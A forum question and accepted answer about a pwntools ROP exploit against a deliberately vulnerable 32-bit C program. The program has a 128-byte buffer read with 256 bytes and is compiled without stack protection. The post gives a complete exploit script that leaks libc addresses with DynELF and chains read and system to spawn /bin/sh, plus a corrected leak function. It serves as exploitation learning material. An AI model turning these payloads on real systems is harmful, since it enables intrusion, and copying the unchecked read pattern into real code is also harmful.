# using pwntools. why this additional and(it seems irrelavent) line can change the result of my rop

Tags: buffer-overflow

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}

int main(int argc, char** argv) {
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}
```

platform:gcc version 4.8.4 linux 4.2.0-18 x64
complie:gcc -m32 -fno-stack-protector test.c -o level2

```
from pwn import *

elf=ELF('./level2')
plt_write=elf.symbols['write']
plt_read=elf.symbols['read']
vulfun_addr=0x804844d

def leak(address):
    payload1='a'*140+p32(plt_write)+p32(vulfun_addr)+p32(1)+p32(address)+p32(4)
    p.send(payload1)
    data=p.recv(4)
    print "%#x => %s" % (address, (data or '').encode('hex'))
    return data

p=process('./level2')

d=DynELF(leak,elf=ELF('./level2'))

system_addr=d.lookup('system','libc')
print "system_addr=" + hex(system_addr)
scanf=d.lookup('scanf','libc')#????????????if I add this line, rop success.
print "scanf_addr=" + hex(scanf)

bss_addr=0x804a024
pppr=0x0804850d

payload2='a'*140+p32(plt_read)+p32(pppr)+p32(0)+p32(bss_addr)+p32(8)

payload2+=p32(system_addr)+p32(vulfun_addr)+p32(bss_addr)

print "\n###sending payload2 ...###"
p.send(payload2)
p.send('/bin/sh\0')

p.interactive()
```

I really cannot understand why that line can turn it into success. If I remove it,the target will be waiting at read() (it didn't get the string from p.send('/bin/sh\0')) then exit with code -11. Except this,everything goes well.

Maybe it's about buffer flush?

Answer (score 0, accepted):

It is because your leak function overwrite too many bytes on the stack. It seemed that the environment variables are broken by this leak operation. So the do_system process in system function can't work properly.

Please remind it is important to balance the stack when using leak function.

this will solve your problem:

```
def leak(address):  
    payload = 'A'*140 + p32(pr) + p32(0) + p32(pr) + p32(0) + p32(plt_write) + p32(main_address) #using two "pop | ret" gadget to balance the stack
    payload += p32(1) + p32(address) +p32(4)
    p.send(payload)
    data = p.recv(4)
    print "%#x => %s" % (address, (data or '').encode('hex'))
    return data
```

The two "pop|ret" gadgat make a $esp+16, and you can see the address of the buf on stack won't change any more after every leak operation.